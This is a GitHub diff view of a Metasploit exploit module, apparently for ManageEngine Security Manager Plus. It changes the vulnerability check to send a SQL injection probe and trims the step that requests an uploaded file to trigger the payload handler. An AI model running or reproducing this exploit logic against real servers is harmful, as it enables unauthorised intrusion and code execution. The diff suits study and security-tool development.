File tree Expand file tree Collapse file tree 1 file changed +5
-7
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +5
-7
lines changed Original file line number Diff line number Diff line change @@ -52,14 +52,11 @@ def initialize(info={})
52
52
end
53
53
54
54
55
- #
56
- # A very gentle check to see if Security Manager Plus exists or not
57
- #
58
55
def check
59
- res = send_request_raw ( { 'uri' => '/SecurityManager.cc' } )
56
+ res = sqli_exec ( Rex :: Text . rand_text_alpha ( 1 ) )
60
57
61
- if res and res . body =~ /\< title \> SecurityManager Plus \< \/ title \> /
62
- return Exploit ::CheckCode ::Detected
58
+ if res and res . body =~ /Error during search /
59
+ return Exploit ::CheckCode ::Appears
63
60
else
64
61
return Exploit ::CheckCode ::Safe
65
62
end
@@ -82,6 +79,7 @@ def pick_target
82
79
83
80
res = send_request_raw ( { 'uri' => "/#{ rnd_fname } " } )
84
81
82
+ # What @@version returns:
85
83
# Linux = 5.0.36-enterprise
86
84
# Windows = 5.0.36-enterprise-nt
87
85
@@ -248,7 +246,7 @@ def inject_exec(out)
248
246
249
247
fname = "/#{ File . basename ( out ) } "
250
248
print_status ( "#{ rhost } :#{ rport } - Requesting #{ fname } " )
251
- res = send_request_raw ( { 'uri' => fname } )
249
+ send_request_raw ( { 'uri' => fname } )
252
250
253
251
handler
254
252
end
You can’t perform that action at this time.
0 commit comments